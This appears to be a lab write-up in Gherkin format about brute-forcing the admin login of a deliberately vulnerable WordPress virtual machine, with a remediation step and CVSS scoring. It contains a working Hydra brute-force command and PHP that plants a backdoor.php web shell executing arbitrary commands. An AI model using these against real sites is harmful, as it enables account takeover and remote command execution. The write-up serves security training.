## Version 1.4.1
## language: en

Feature:
  TOE:
    CK-00
  Location:
    http://192.168.1.69/wp-login.php
  CWE:
    CWE-307: Improper Restriction of Excessive Authentication Attempts
  Rule:
    REQ.237: https://fluidattacks.com/web/rules/237/
  Goal:
    Get access to the admin area
  Recommendation:
    Restrict multiple login attempts

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ArchLinux       | 2020.07.01  |
    | Brave           | 1.10.97     |
    | Hydra           | 9.0         |
    | Virtualbox      | 6.1         |
  TOE information:
    Given The machine is running in a virtualbox
    And I am accessing to the site at http://192.168.1.69/

  Scenario: Normal use case
    Given I access http://192.168.1.69/wp-login.php
    When I see a login form
    Then if I try a bad username a password
    And the form shakes and I am asked for a username and password again

  Scenario: Static detection
    Given I do not have acces to the source code
    Then I can't perform a static detection

  Scenario: Dynamic detection
    Given the login form
    When I try to login with bad username and passwords
    Then I can see that the system simply askme to login again
    And no matter how many times I try the system always ask again to login
    And I can conclude that the system is vulnerable to a bruteforce attack

  Scenario: Exploitation
    Given I know the system its vulnerable to a bruteforce attack
    When I use hydra on the login page
    """
    hydra -l admin -P password.lst 192.168.1.69 -V \
    http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:login_error"
    """
    Then I can get the admin's password [evidence](hydra.png)
    And I can conclude that the site can be exploited

  Scenario: Maintaining access
    Given I have admin access
    And I can install a plugin to run PHP code
    When I insert the following PHP code to a post
    """
    <?php
      $code = '<?php echo system(\$_GET["id"]); ?>';
      system('echo "' . $code .  '" > backdoor.php');
    ?>
    """
    Then the file backdoor.php will be created
    When I go to
    """
    http://192.168.1.69/backdoor.php?id={command}
    """
    Then the page will execute command on the server
    Then I can conclude that I can mantain access even if I lose admin access

  Scenario: Remediation
    Given I have admin access
    When I install and configure the plugin "Captcha Bank"
    Then the login section now asks for user, password
    And to solve a captcha [evidence](captcha.png)
    Then If I re-run hydra I get
    """
    1 of 1 target completed, 0 valid passwords found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at
    2020-07-10 09:06:23
    """
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10.0 (Critical) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.7 (Critical) - E:H/RL:W/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.7 (Critical) - MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date {2020-07-10}
